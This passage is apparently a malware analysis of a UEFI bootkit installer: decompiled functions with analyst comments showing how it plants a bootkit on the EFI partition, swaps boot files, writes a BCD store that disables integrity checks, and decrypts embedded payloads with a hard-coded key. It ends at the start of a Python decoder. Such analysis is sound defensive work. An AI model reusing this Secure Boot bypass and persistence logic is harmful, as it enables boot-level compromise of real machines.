//    FILE_OPENED, i.e. the installer ran before) it only overwrites
//    bootmgfw.efi with the shim and returns success;
//  - otherwise (FILE_CREATED) it unpacks the remaining payloads — the original
//    bootmgfw.efi and bootmgr.efi, hvloader.efi, two BCD stores and the
//    mcupdate payload the analysis attributes to CVE-2022-21894 — and writes
//    them to <Boot>\bootload.efi, <Boot>\bootmgfw.efi and
//    <ESP>\system32\{hvloader.efi, bootmgr.efi, BCD, mcupdate_AuthenticAMD.dll,
//    mcupdate_GenuineIntel.dll}; the BCD contents are reproduced in the
//    comments before each write;
//  - with SeBackupPrivilege saves \Registry\Machine\BCD00000000 to
//    <Boot>\BCDR, then with SeRestorePrivilege hands the decrypted
//    bcd_setup0 hive and <Boot>\tmp to write_to_registry (presumably loading
//    it over that key).
// All payloads use the same obfuscated key blob (lzms_key_140009F80), which
// is re-deobfuscated before every use — apparently because the scratch
// buffer is reused. The three deobfuscated English sentences are unused
// decoys. Returns isSuccess; buffers and the directory handle are released
// at END. Parameters: esp_bootmgfw_path is the destination of the shim /
// original boot manager; bootkit_data/bootkit_size is the decrypted bootkit.
_BOOL8 __fastcall write_file_SecureBoot_140002E50(
const WCHAR *esp_bootmgfw_path,
void *bootkit_data,
ULONG bootkit_size)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
FileHandle = 0i64;
bootload_data = 0i64;
official_bootmgfw_data = 0i64;
official_bootmgr_data = 0i64;
hvloader_data = 0i64;
length = 0;
isSuccess = 0;
v81 = 0;
bcd_setup0_data = 0i64;
v83 = 0;
mcupdate_data = 0i64;
v82 = 0;
pcbOutput = 0;
v84 = 0;
v80 = 0;
memset_140001000(tmp, 0, sizeof(tmp));
memset_140001000(esp_system, 0, sizeof(esp_system));
memset_140001000(BCDR, 0, sizeof(BCDR));
memset_140001000(esp_tmp, 0, sizeof(esp_tmp));
memset_140001000(bcd_reg, 0, sizeof(bcd_reg));
esp_boot_path = get_esp_boot_path();
if ( esp_boot_path )
{
// Inlined bounded wide-string copy (decompiled wcsncpy, 0x104 chars); the same
// pattern recurs for every path built in this function.
v10 = esp_system;
v11 = 0x104i64;
do
{
if ( v11 == 0xFFFFFFFF80000106ui64 )
break;
v12 = *(wchar_t *)((char *)v10 + (char *)esp_boot_path - (char *)esp_system);
if ( !v12 )
break;
*v10++ = v12;
--v11;
}
while ( v11 );
v13 = v10 + 0xFFFFFFFF;
if ( v11 )
v13 = v10;
*v13 = 0;
esp_system[(unsigned int)wcslen_1400058DC(esp_system) - 19] = 0;// strip "EFI\Microsoft\Boot\" (\EFI\Microsoft\Boot\ is 20 chars)
// system32\
v14 = deobfuscate_wstring(word_140009F08, 0xAu, 1);
wcsncat(esp_system, 0x104ui64, v14); // \system32\
// \Registry\Machine\BCD00000000
v15 = deobfuscate_wstring(word_140009F20, 0x1Eu, 1);
v16 = bcd_reg;
v17 = (char *)v15 - (char *)bcd_reg;
v18 = 0x104i64;
do
{
if ( v18 == 0xFFFFFFFF80000106ui64 )
break;
v19 = *(wchar_t *)((char *)v16 + v17);
if ( !v19 )
break;
*v16++ = v19;
--v18;
}
while ( v18 );
v20 = v18 == 0;
v21 = v16 + 0xFFFFFFFF;
v22 = 0x104i64;
if ( !v20 )
v21 = v16;
v23 = tmp;
*v21 = 0;
v24 = (char *)esp_boot_path - (char *)tmp; // offset reused below whenever tmp is rebuilt from esp_boot_path
do
{
if ( v22 == 0xFFFFFFFF80000106ui64 )
break;
esp_path = *(wchar_t *)((char *)v23 + v24);
if ( !esp_path )
break;
*v23++ = esp_path;
--v22;
}
while ( v22 );
v26 = v23 + 0xFFFFFFFF;
if ( v22 )
v26 = v23;
*v26 = 0;
// grubx64.efi
grubx64_efi = deobfuscate_wstring(word_140009F60, 0xCu, 1);
wcsncat(tmp, 260ui64, grubx64_efi);
// bootkit --> written to esp \EFI\Microsoft\Boot\grubx64.efi
if ( !write_file(tmp, bootkit_data, bootkit_size) )// write bootkit
goto LABEL_92;
RtlInitUnicodeString_14026B000(v92, esp_system);
ObjectAttributes.Length = 0x30;
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Attributes = 0x40; // OBJ_CASE_INSENSITIVE
ObjectAttributes.ObjectName = (PUNICODE_STRING)v92;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
// Create or open ESP:/system32/ (0x120116 = FILE_GENERIC_WRITE, options 1 = FILE_DIRECTORY_FILE).
// IoStatusBlock.Information afterwards tells whether it existed (FILE_OPENED) or was created.
if ( NtCreateFile(
&FileHandle,
0x120116u,
&ObjectAttributes,
&IoStatusBlock,
0i64,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ,
FILE_OPEN_IF,
1u,
0i64,
0) < 0 )
goto LABEL_92;
// 6jxkPUHKRK5rgdg0PkhLhuS844uMYgrm
v28 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1);
// Legitimate Microsoft-signed shim binary
if ( !(unsigned int)decompress_crypted_lzms(
shim_140021FC0,
0x51520u,
v28,
(__int64 *)&bootload_data,
(int *)&length) )
goto LABEL_92;
if ( IoStatusBlock.Information == 1 ) // FILE_OPENED
{ // esp \system32\ already exists, i.e. this is a second run:
// replace esp \EFI\Microsoft\Boot\bootmgfw.efi with the shim and return
// Legitimate Microsoft-signed shim binary --> written to esp \EFI\Microsoft\Boot\bootmgfw.efi
if ( write_file(esp_bootmgfw_path, bootload_data, length) )
{
isSuccess = 1;
bcd_exp_data = 0i64;
goto END;
}
goto LABEL_92;
}
// First run (ESP:/system32/ was just created): unpack every remaining payload
// up front; any failure in the chain bails out to LABEL_92.
if ( IoStatusBlock.Information != FILE_CREATED// first run, ESP:/system32/ created
|| (v30 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1),
!(unsigned int)decompress_crypted_lzms(
official_bootmgfw_14007CAA0,
0xBBB60u,
v30,
(__int64 *)&official_bootmgfw_data,
(int *)&v81))
|| (v31 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1),
!(unsigned int)decompress_crypted_lzms(
official_bootmgr_140138600,
0xBA950u,
v31,
(__int64 *)&official_bootmgr_data,
(int *)&v83))
|| (v32 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1),
!(unsigned int)decompress_crypted_lzms(
hvloader_1401F2F50,
0x75570u,
v32,
(__int64 *)&hvloader_data,
(int *)&v82))
|| (v33 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1),
(bcd_setup0_data = aes_256_cbc_decrypt(bcd_setup0_140075A80, v33, 0x3010u, &pcbOutput)) == 0i64) )
{
LABEL_92:
bcd_exp_data = 0i64;
goto LABEL_93;
}
v34 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1);
bcd_exp_data = aes_256_cbc_decrypt(bcd_exp_140078A90, v34, 0x4010u, &v84);
if ( !bcd_exp_data )
{
LABEL_93:
isSuccess = 0;
goto END;
}
v35 = deobfuscate_bytes(lzms_key_140009F80, 0x21u, 1);
mcupdate_data = aes_256_cbc_decrypt(mcupdate_1400734E0, v35, 0x25A0u, &v80);
if ( !mcupdate_data )
goto LABEL_114;
// I have a question for you
deobfuscate_wstring(word_140009FA8, 0x1Au, 1); // decoy string; result discarded
memset_140001000(tmp, 0, sizeof(tmp));
v36 = 0x104i64;
v37 = tmp;
do
{
if ( v36 == 0xFFFFFFFF80000106ui64 )
break;
v38 = *(wchar_t *)((char *)v37 + v24);
if ( !v38 )
break;
*v37++ = v38;
--v36;
}
while ( v36 );
v39 = v37 + 0xFFFFFFFF;
if ( v36 )
v39 = v37;
*v39 = 0;
// bootload.efi
v40 = deobfuscate_wstring(word_140009FE0, 0xDu, 1);
wcsncat(tmp, 0x104ui64, v40); // \EFI\Microsoft\Boot\bootload.efi
if ( !write_file(tmp, bootload_data, length) || !write_file(esp_bootmgfw_path, official_bootmgfw_data, v81) )// shim written to esp \EFI\Microsoft\Boot\bootload.efi
// official_bootmgfw_data written to esp \EFI\Microsoft\Boot\bootmgfw.efi
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v41 = 0x104i64;
v42 = tmp;
do
{
if ( v41 == 0xFFFFFFFF80000106ui64 )
break;
v43 = v42[0x108]; // esp \system32\ -- index 0x108 runs past tmp into the adjacent esp_system buffer (decompiler rendering of copying esp_system into tmp, inferred from the stack layout)
if ( !v43 )
break;
*v42++ = v43;
--v41;
}
while ( v41 );
v44 = v42 + 0xFFFFFFFF;
if ( v41 )
v44 = v42;
*v44 = 0;
// hvloader.efi
v45 = deobfuscate_wstring(word_14000A000, 0xDu, 1);
wcsncat(tmp, 0x104ui64, v45); // esp \system32\hvloader.efi
if ( !write_file(tmp, hvloader_data, v82) ) // hvloader_data written to esp \system32\hvloader.efi
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v46 = 0x104i64;
v47 = tmp;
do
{
if ( v46 == 0xFFFFFFFF80000106ui64 )
break;
v48 = v47[0x108]; // esp \system32\
if ( !v48 )
break;
*v47++ = v48;
--v46;
}
while ( v46 );
v49 = v47 + 0xFFFFFFFF;
if ( v46 )
v49 = v47;
*v49 = 0;
// bootmgr.efi
v50 = deobfuscate_wstring(word_14000A020, 0xCu, 1);
wcsncat(tmp, 0x104ui64, v50); // esp \system32\bootmgr.efi
if ( !write_file(tmp, official_bootmgr_data, v83) )// official_bootmgr_data written to esp \system32\bootmgr.efi
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v51 = 0x104i64;
v52 = tmp;
do
{
if ( v51 == 0xFFFFFFFF80000106ui64 )
break;
v53 = v52[0x108]; // esp \system32\
if ( !v53 )
break;
*v52++ = v53;
--v51;
}
while ( v51 );
v54 = v52 + 0xFFFFFFFF;
if ( v51 )
v54 = v52;
*v54 = 0;
// BCD
v55 = deobfuscate_wstring(word_14000A040, 4u, 1);
wcsncat(tmp, 0x104ui64, v55); // esp \system32\BCD
// Contents of the BCD store written here (bcd_exp_data), as listed by the analyst.
// Note the loader entry disables integrity checks and enables test signing.
// Windows Boot Manager
// --------------------
// identifier {9dea862c-5cdd-4e70-acc1-f32b344d4795}
// description Windows Boot Manager
// locale en-US
// inherit {7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e}
// bootdebug Yes
// displayorder {57e1b615-0355-11ec-abb0-005056c00008}
// timeout 30
// Windows Boot Loader
// -------------------
// identifier {57e1b615-0355-11ec-abb0-005056c00008}
// device boot
// path \system32\hvloader.efi
// description Hoy la disco se flota
// locale en-US
// inherit {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
// truncatememory 0x10000000
// avoidlowmemory 0x1000
// nointegritychecks Yes
// testsigning Yes
// isolatedcontext Yes
// osdevice boot
// systemroot \
// ems Yes
if ( !write_file(tmp, bcd_exp_data, v84) ) // bcd_exp_data written to esp \system32\BCD
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v56 = 0x104i64;
v57 = tmp;
do
{
if ( v56 == 0xFFFFFFFF80000106ui64 )
break;
v58 = v57[0x108]; // esp \system32\
if ( !v58 )
break;
*v57++ = v58;
--v56;
}
while ( v56 );
v59 = v57 + 0xFFFFFFFF;
if ( v56 )
v59 = v57;
*v59 = 0;
// mcupdate_AuthenticAMD.dll
v60 = deobfuscate_wstring(word_14000A050, 0x1Au, 1);
wcsncat(tmp, 0x104ui64, v60); // esp \system32\mcupdate_AuthenticAMD.dll
if ( !write_file(tmp, mcupdate_data, v80) ) // same mcupdate_data payload for both vendor file names
goto LABEL_114;
memset_140001000(tmp, 0, sizeof(tmp));
v61 = 0x104i64;
v62 = tmp;
do
{
if ( v61 == 0xFFFFFFFF80000106ui64 )
break;
v63 = v62[0x108]; // esp \system32\
if ( !v63 )
break;
*v62++ = v63;
--v61;
}
while ( v61 );
v64 = v62 + 0xFFFFFFFF;
if ( v61 )
v64 = v62;
*v64 = 0;
// mcupdate_GenuineIntel.dll
v65 = deobfuscate_wstring(word_14000A088, 0x1Au, 1);
wcsncat(tmp, 0x104ui64, v65);
if ( !write_file(tmp, mcupdate_data, v80) ) // esp \system32\mcupdate_GenuineIntel.dll
goto LABEL_114;
// SeBackupPrivilege
v66 = deobfuscate_wstring(word_14000A0C0, 0x12u, 1);
if ( !(unsigned int)obtain_privilege(v66) )
goto LABEL_114;
// do you think even the worst person can change?
deobfuscate_wstring(word_14000A0F0, 0x2Fu, 1); // decoy string; result discarded
// that everybody can be a good person, if they just try?
deobfuscate_wstring(word_14000A150, 0x37u, 1); // decoy string; result discarded
v67 = BCDR;
v68 = 0x104i64;
do
{
if ( v68 == 0xFFFFFFFF80000106ui64 )
break;
v69 = *(wchar_t *)((char *)v67 + (char *)esp_boot_path - (char *)BCDR);
if ( !v69 )
break;
*v67++ = v69;
--v68;
}
while ( v68 );
v70 = v67 + 0xFFFFFFFF;
if ( v68 )
v70 = v67;
*v70 = 0;
// BCDR
v71 = deobfuscate_wstring(word_14000A1C0, 5u, 1);
wcsncat(BCDR, 0x104ui64, v71);
// \Registry\Machine\BCD00000000
// back up the live BCD hive to \EFI\Microsoft\Boot\BCDR (needs SeBackupPrivilege)
if ( (unsigned int)savekey_140006964(BCDR, bcd_reg)
// SeRestorePrivilege
&& (v72 = deobfuscate_wstring(word_14000A1D0, 0x13u, 1), (unsigned int)obtain_privilege(v72)) )
{
v73 = esp_tmp;
v74 = 0x104i64;
do
{
if ( v74 == 0xFFFFFFFF80000106ui64 )
break;
v75 = *(wchar_t *)((char *)v73 + (char *)esp_boot_path - (char *)esp_tmp);
if ( !v75 )
break;
*v73++ = v75;
--v74;
}
while ( v74 );
v76 = v73 + 0xFFFFFFFF;
if ( v74 )
v76 = v73;
*v76 = 0;
// tmp
v77 = deobfuscate_wstring(word_14000A1F8, 4u, 1);
wcsncat(esp_tmp, 0x104ui64, v77); // \EFI\Microsoft\Boot\tmp
// Contents of the replacement BCD hive (bcd_setup0_data), as listed by the analyst;
// its loader entry points at \system32\bootmgr.efi and references \system32\bcd.
// Windows Boot Manager
// --------------------
// identifier {9dea862c-5cdd-4e70-acc1-f32b344d4795}
// description Windows Boot Manager
// locale en-US
// inherit {7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e}
// bootdebug No
// displayorder {527f84fc-036e-11ec-abb0-005056c00008}
// timeout 30
// Windows Boot Loader
// -------------------
// identifier {527f84fc-036e-11ec-abb0-005056c00008}
// device boot
// path \system32\bootmgr.efi
// description RIP the woo
// locale en-US
// inherit {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
// avoidlowmemory 0x10000000
// bootdebug No
// isolatedcontext Yes
// custom:22000023 \system32\bcd
// ems Yes
isSuccess = write_to_registry((__int64)esp_tmp, bcd_reg, bcd_setup0_data, pcbOutput) != 0;// bcd_setup0_data written to esp \EFI\Microsoft\Boot\tmp and applied to \Registry\Machine\BCD00000000
}
else
{
LABEL_114:
isSuccess = 0;
}
}
else
{
bcd_exp_data = 0i64;
}
END:
// Release everything; each pointer is NULL unless its step succeeded.
if ( FileHandle )
NtClose(FileHandle);
if ( mcupdate_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, mcupdate_data);
if ( bcd_exp_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, bcd_exp_data);
if ( bcd_setup0_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, bcd_setup0_data);
if ( official_bootmgfw_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, official_bootmgfw_data);
if ( official_bootmgr_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, official_bootmgr_data);
if ( hvloader_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, hvloader_data);
if ( bootload_data )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, bootload_data);
if ( esp_boot_path )
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, esp_boot_path);
return isSuccess;
}
加解密相关函数
deobfuscate_bytes
/*
 * deobfuscate_bytes - decode one obfuscated ANSI string into the installer's
 * shared byte scratch buffer (tablebase_14026A440.sbuf).
 *
 * a1: obfuscated bytes; a2: their count, the last slot being the terminator
 * (so the visible text is a2-1 characters); a3: non-zero resets the buffer
 * (sbuf_offset = 0, buffer zeroed) so the result lands at sbuf[0], zero
 * appends after the strings decoded since the last reset so that several
 * results can stay live at once.
 *
 * Returns a pointer to the decoded, NUL-terminated string inside sbuf, or
 * NULL when a2 < 2. The buffer is a fixed-size global and nothing here checks
 * that offset + a2 still fits in it.
 *
 * Transform (same as deobfuscate_wstring, on bytes; Python port: doxor()):
 *   1. each byte above 0x7F is reduced by 0x60, the rest are used as is;
 *   2. running XOR from the end: out[i-1] = out[i] ^ map(in[i-1]);
 *   3. adjacent pairs are swapped;
 *   4. the string is reversed;
 *   5. the last slot is set to 0.
 * The "(_BYTE *)&tablebase_14026A440.wsbuf[999] + a2 + sbuf_offset + 1"
 * expressions are the decompiler's rendering of sbuf[a2 + sbuf_offset - 1];
 * that reading assumes sbuf immediately follows the 1000-WORD wsbuf in the
 * struct -- TODO confirm the struct layout in the database.
 */
BYTE *__fastcall deobfuscate_bytes(BYTE *a1, unsigned int a2, int a3)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
  v3 = 0i64;                                    // result pointer; NULL for a2 < 2
  if ( a2 >= 2 )
  {
    if ( a3 )
    {
      // Fresh decode: rewind to slot 0 and clear everything decoded so far.
      tablebase_14026A440.sbuf_offset = 0;
      memset_140001000(tablebase_14026A440.sbuf, 0, sizeof(tablebase_14026A440.sbuf));
    }
    v6 = a2 - 1;                                // index of the terminator slot
    v7 = a1[v6];
    v3 = &tablebase_14026A440.sbuf[tablebase_14026A440.sbuf_offset];
    v8 = v7 - 0x60;                             // byte mapping: > 0x7F -> minus 0x60
    if ( v7 <= 0x7Fu )
      v8 = a1[v6];
    v9 = 0;
    // Seed sbuf[a2 + offset - 1] with the mapped last byte. The first loop
    // iteration below recomputes the same slot from the (zero) slot after the
    // string, so this store is effectively redundant.
    *((_BYTE *)&tablebase_14026A440.wsbuf[999] + a2 + tablebase_14026A440.sbuf_offset + 1) = v8;
    do                                          // 1./2. backwards running XOR
    {
      v10 = a2 + tablebase_14026A440.sbuf_offset - v9;
      v11 = a1[a2 - v9 - 1];                    // input consumed from the end
      v12 = v11 - 0x60;
      if ( v11 <= 0x7Fu )
        v12 = a1[a2 - v9 - 1];
      ++v9;
      // out[i-1] = out[i] ^ map(in[i-1]); reads one slot past the string on
      // the first pass, which is zero as long as the buffer was reset.
      tablebase_14026A440.sbuf[(unsigned int)(v10 - 1)] = tablebase_14026A440.sbuf[v10] ^ v12;
    }
    while ( v9 < a2 );
    v13 = 0;
    if ( a2 != 1 )
    {
      do                                        // 3. swap every adjacent pair
      {
        v14 = v13 + tablebase_14026A440.sbuf_offset;
        v15 = tablebase_14026A440.sbuf[v14];
        tablebase_14026A440.sbuf[v14] = tablebase_14026A440.sbuf[(unsigned int)(v14 + 1)];
        v16 = v13 + tablebase_14026A440.sbuf_offset + 1;
        v13 += 2;
        tablebase_14026A440.sbuf[v16] = v15;
      }
      while ( v13 < (unsigned int)v6 );
    }
    // 4. reverse: swap slot i with slot a2-1-i (both spelled through the
    //    wsbuf[999] alias by the decompiler).
    for ( i = 0; i < a2 >> 1; *((_BYTE *)&tablebase_14026A440.wsbuf[999] + a2 + v19 + 1) = v18 )
    {
      v18 = tablebase_14026A440.sbuf[tablebase_14026A440.sbuf_offset + i];
      tablebase_14026A440.sbuf[tablebase_14026A440.sbuf_offset + i] = *((_BYTE *)&tablebase_14026A440.wsbuf[0x3E7] + tablebase_14026A440.sbuf_offset - i + a2 + 1);
      v19 = tablebase_14026A440.sbuf_offset - i++;
    }
    // 5. terminate, then reserve the slots so a later a3 == 0 call appends.
    *((_BYTE *)&tablebase_14026A440.wsbuf[999] + a2 + tablebase_14026A440.sbuf_offset + 1) = 0;
    tablebase_14026A440.sbuf_offset += a2;
  }
  return v3;
}
deobfuscate_wstring
/*
 * deobfuscate_wstring - decode one obfuscated UTF-16 string into the
 * installer's shared wide scratch buffer (tablebase_14026A440.wsbuf).
 *
 * ws: obfuscated WORDs; wslen: their count, the last slot being the
 * terminator (so the visible text is wslen-1 characters); isNew: non-zero
 * resets the buffer (wsbuf_offset = 0, buffer zeroed), zero appends after the
 * strings decoded since the last reset. The callers in this file pass 1 for a
 * fresh string and 0 when an earlier result must stay valid (for example the
 * bcrypt property names in aes_256_cbc_decrypt).
 *
 * Returns a pointer to the decoded, NUL-terminated string inside wsbuf, or
 * NULL when wslen < 2. The buffer is a fixed-size global and nothing here
 * checks that offset + wslen still fits in it.
 *
 * Transform: values above 0x7F are reduced by 0x60, then a backwards running
 * XOR, a swap of adjacent pairs, a reversal, and a zero terminator. The same
 * transform on bytes is deobfuscate_bytes; the Python port is doxor() below.
 */
WORD *__fastcall deobfuscate_wstring(WORD *ws, unsigned int wslen, int isNew)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
  outptr = 0i64;                                // result pointer; NULL for wslen < 2
  if ( wslen >= 2 )
  {
    if ( isNew )
    {
      // Fresh decode: rewind to slot 0 and clear everything decoded so far.
      tablebase_14026A440.wsbuf_offset = 0;
      memset_140001000(tablebase_14026A440.wsbuf, 0, sizeof(tablebase_14026A440.wsbuf));
    }
    end_index = wslen - 1;                      // index of the terminator slot
    end = ws[end_index] - 0x60;                 // mapping: > 0x7F -> minus 0x60
    v8 = 0;
    outptr = &tablebase_14026A440.wsbuf[tablebase_14026A440.wsbuf_offset];
    if ( ws[end_index] <= 0x7Fu )
      end = ws[end_index];
    // Seed the last slot. The first loop iteration recomputes it from the
    // (zero) slot after the string, so this store is effectively redundant.
    tablebase_14026A440.wsbuf[wslen - 1 + tablebase_14026A440.wsbuf_offset] = end;
    do                                          // 1. running XOR, walking backwards
    {
      rindex = wslen + tablebase_14026A440.wsbuf_offset - v8;
      v10 = ws[wslen - v8 - 1];                 // input consumed from the end
      rtmp = v10 - 0x60;
      if ( v10 <= 0x7Fu )
        rtmp = ws[wslen - v8 - 1];
      ++v8;
      // out[i-1] = out[i] ^ map(in[i-1]): every slot ends up as the XOR of
      // the mapped input suffix that starts there. Reads one slot past the
      // string on the first pass, which is zero as long as the buffer was reset.
      tablebase_14026A440.wsbuf[(unsigned int)(rindex - 1)] = tablebase_14026A440.wsbuf[rindex] ^ rtmp;
    }
    while ( v8 < wslen );
    v12 = 0;
    if ( wslen != 1 )
    {
      do                                        // 2. swap every adjacent pair
      {
        v13 = v12 + tablebase_14026A440.wsbuf_offset;
        v14 = tablebase_14026A440.wsbuf[v13];
        tablebase_14026A440.wsbuf[v13] = tablebase_14026A440.wsbuf[(unsigned int)(v13 + 1)];
        v15 = v12 + tablebase_14026A440.wsbuf_offset + 1;
        v12 += 2;
        tablebase_14026A440.wsbuf[v15] = v14;
      }
      while ( v12 < (unsigned int)end_index );
    }
    // 3. reverse: swap slot i with slot wslen-1-i.
    for ( i = 0; i < wslen >> 1; tablebase_14026A440.wsbuf[wslen - 1 + v18] = tmp )
    {
      tmp = tablebase_14026A440.wsbuf[tablebase_14026A440.wsbuf_offset + i];
      tablebase_14026A440.wsbuf[tablebase_14026A440.wsbuf_offset + i] = tablebase_14026A440.wsbuf[tablebase_14026A440.wsbuf_offset - i - 1 + wslen];
      v18 = tablebase_14026A440.wsbuf_offset - i++;
    }
    // 4. terminate, then reserve the slots so a later isNew == 0 call appends.
    tablebase_14026A440.wsbuf[wslen - 1 + tablebase_14026A440.wsbuf_offset] = 0;
    tablebase_14026A440.wsbuf_offset += wslen;
  }
  return outptr;
}
aes_256_cbc_decrypt
/*
 * aes_256_cbc_decrypt - decrypt an embedded payload with CNG (bcrypt).
 *
 * pbInput/cbInput: ciphertext; pbSecret: the key, 0x20 = 32 bytes as
 * hard-coded in the BCryptGenerateSymmetricKey call (hence AES-256);
 * pcbOutput: receives the plaintext length on success.
 *
 * Scheme, as read from the calls below: provider "AES", ChainingMode set to
 * ChainingModeCBC, no IV passed (pbIV = NULL, cbIV = 0; the companion Python
 * script reproduces this with 16 zero bytes), dwFlags = 1 =
 * BCRYPT_BLOCK_PADDING, so CNG removes the PKCS#7 padding from the result.
 * There is no integrity check at all (plain CBC, no MAC), and the key lives
 * in the binary, which is what makes the payloads recoverable offline.
 *
 * Returns a zero-initialised heap buffer with the plaintext, or NULL if the
 * provider/key setup or the output allocation failed. Caveats as decompiled:
 * the size-query BCryptDecrypt result is not checked, and when the second
 * BCryptDecrypt fails the buffer is still returned while *pcbOutput is left
 * untouched -- callers must initialise *pcbOutput to 0 and treat 0 as failure
 * (decompress_crypted_lzms does exactly that). The key handle, key object and
 * provider are released on every path; the decompiler shows BCryptDestroyKey
 * without its argument, presumably the key handle v20. All the BCrypt and Rtl
 * names are the installer's hash-resolved function pointers.
 */
UCHAR *__fastcall aes_256_cbc_decrypt(UCHAR *pbInput, UCHAR *pbSecret, ULONG cbInput, DWORD *pcbOutput)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
  v19 = 0i64;                                   // algorithm provider handle
  v20 = 0i64;                                   // symmetric key handle
  v18 = 0;                                      // bytes returned by BCryptGetProperty
  v16 = 0;                                      // plaintext length
  v17 = 0;                                      // key object length
  v8 = 0i64;                                    // plaintext buffer (returned)
  v9 = 0i64;                                    // key object buffer
  // AES
  v10 = deobfuscate_wstring(word_140009010, 4u, 0);
  if ( (int)BCryptOpenAlgorithmProvider_14026B0F0(&v19, v10, 0i64, 0i64) >= 0 )
  {
    // ChainingModeCBC
    v11 = deobfuscate_wstring(word_140009020, 0x10u, 0);
    // ChainingMode
    v12 = deobfuscate_wstring(word_140009048, 0xDu, 0);
    // 0x20 bytes = L"ChainingModeCBC" including its terminator.
    if ( (int)BCryptSetProperty_14026B0F8(v19, v12, v11, 0x20i64, 0) >= 0 )
    {
      // ObjectLength
      v13 = deobfuscate_wstring(word_140009068, 0xDu, 0);
      if ( (int)BCryptGetProperty_14026B180(v19, v13, &v17, 4i64, &v18, 0) >= 0 )
      {
        // Flag 8 = HEAP_ZERO_MEMORY for the key object.
        Heap_14026B010 = RtlAllocateHeap_14026B010(NtCurrentPeb()->ProcessHeap, 8i64, v17);
        v9 = Heap_14026B010;
        if ( Heap_14026B010 )
        {
          // 32-byte secret -> AES-256.
          if ( (int)BCryptGenerateSymmetricKey_14026B100(v19, &v20, Heap_14026B010, v17, pbSecret, 0x20, 0) >= 0 )
          {
            // Size query (pbOutput = NULL): only v16 is wanted; status ignored.
            // Argument order: hKey, pbInput, cbInput, pPaddingInfo, pbIV, cbIV,
            // pbOutput, cbOutput, pcbResult, dwFlags (1 = BCRYPT_BLOCK_PADDING).
            BCryptDecrypt_14026B108(v20, pbInput, cbInput, 0i64, 0i64, 0, 0i64, 0, &v16, 1);
            v8 = RtlAllocateHeap_14026B010(NtCurrentPeb()->ProcessHeap, 8i64, v16);
            if ( v8 )
            {
              // On failure v8 is still returned and *pcbOutput stays untouched.
              if ( (int)BCryptDecrypt_14026B108(v20, pbInput, cbInput, 0i64, 0i64, 0, v8, v16, &v16, 1) >= 0 )
                *pcbOutput = v16;
            }
          }
        }
      }
    }
  }
  if ( v20 )
    BCryptDestroyKey_14026B110();               // argument elided by the decompiler
  if ( v9 )
    RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, v9);
  if ( v19 )
    BCryptCloseAlgorithmProvider_14026B118(v19, 0i64);
  return (UCHAR *)v8;
}
decompress_crypted_lzms
/*
 * decompress_crypted_lzms - AES-256-CBC decrypt pbInput with pbSecret (see
 * aes_256_cbc_decrypt) and LZMS-decompress the plaintext.
 *
 * On success stores the decompressed heap buffer in *a4 and its size in *a5
 * and returns 1; the buffer is then owned by the caller. Returns 0 otherwise
 * and leaves *a4/*a5 untouched. The intermediate plaintext is always freed;
 * a decompressed buffer that reported a zero size is freed as well.
 * A zero plaintext length is treated as failure, which is how a failed
 * BCryptDecrypt inside aes_256_cbc_decrypt (returned buffer, size left at 0)
 * is caught here.
 */
__int64 __fastcall decompress_crypted_lzms(UCHAR *pbInput, ULONG cbInput, UCHAR *pbSecret, __int64 *a4, int *a5)
{
  DWORD cbPlain = 0;                            // set by aes_256_cbc_decrypt on success only
  int cbRaw[1] = { 0 };                         // decompressed size from decompress_lzms
  __int64 raw = 0i64;                           // decompressed buffer
  __int64 ok = 0;
  UCHAR *plain;

  plain = aes_256_cbc_decrypt(pbInput, pbSecret, cbInput, &cbPlain);
  if ( !plain )
    return 0;

  if ( cbPlain )
  {
    raw = decompress_lzms((__int64)plain, cbPlain, cbRaw);
    if ( raw && cbRaw[0] )
    {
      *a4 = raw;
      *a5 = cbRaw[0];
      ok = 1;
    }
  }

  // Plaintext is only needed as decompressor input.
  RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, plain);
  // Drop a decompressed buffer that was produced but not handed out.
  if ( raw && !ok )
    RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, raw);
  return ok;
}
py脚本
xor
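# Shared decode buffer mirroring the installer's tablebase_14026A440: a fixed
# 1000-slot scratch area plus a running write offset, so several decoded
# strings can stay live at once when isnew=False (as the installer does for
# the bcrypt property names).
BUF_SIZE = 1000
sbuf = [0 for i in range(BUF_SIZE)]
sbuf_offset = 0
wsbuf = [0 for i in range(BUF_SIZE)]
wsbuf_offset = 0


def doxor(data, size, isnew: bool = True):
    """Decode one obfuscated string (port of deobfuscate_bytes / _wstring).

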